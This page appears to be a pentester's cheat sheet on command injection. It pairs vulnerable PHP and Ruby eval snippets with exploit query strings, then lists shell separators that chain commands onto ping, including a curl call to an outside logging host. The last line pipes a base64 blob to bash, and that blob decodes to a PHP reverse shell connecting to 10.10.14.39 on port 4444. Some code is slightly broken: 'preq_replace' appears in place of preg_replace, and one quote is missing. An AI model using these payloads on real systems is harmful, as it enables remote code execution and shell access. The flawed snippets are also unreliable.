Skip to content

Command Injection

examples

Code Type Exploit
eval("echo \"Hello ".$_GET['name']."!!!\";") php ?name=lorem".system("id")."
echo preq_replace($_GET['pattern'], $_GET['new'], $_GET['base]); php ?new=hacker&pattern=/lamer/&base=Hello%20lamer
?new=phpinfo()&pattern=/lamer/e&base=Hello%20lamer
$message = eval "\"Hello " + params['username']+"\"" ruby ?username=hacker"%2b`uname`%2b"

ping

ping - linux 

ping -c 2 $IP
ping - windows 
ping -n 2 $IP


echo "hack" | id
echo "hack" & id
echo "hack" && id
echo "hack" ; id
echo "hack" ; curl http://log.michalszalkowski.com/15-01-2023/e-corp/test-42

ping -c 2 localhost|id
ping -c 2 localhost | id

ping -c 2 localhost;id
ping -c 2 localhost ; ls -la

ping -c 2 localhost; echo "aWQ=" | base64 -d | bash

ping -c 2 localhost; echo "cGhwIC1yICckc29jaz1mc29ja29wZW4oIjEwLjEwLjE0LjM5Iiw0NDQ0KTskcHJvYz1wcm9jX29wZW4oIi9iaW4vYmFzaCIsIGFycmF5KDA9PiRzb2NrLCAxPT4kc29jaywgMj0+JHNvY2spLCRwaXBlcyk7Jw==" | base64 -d | bash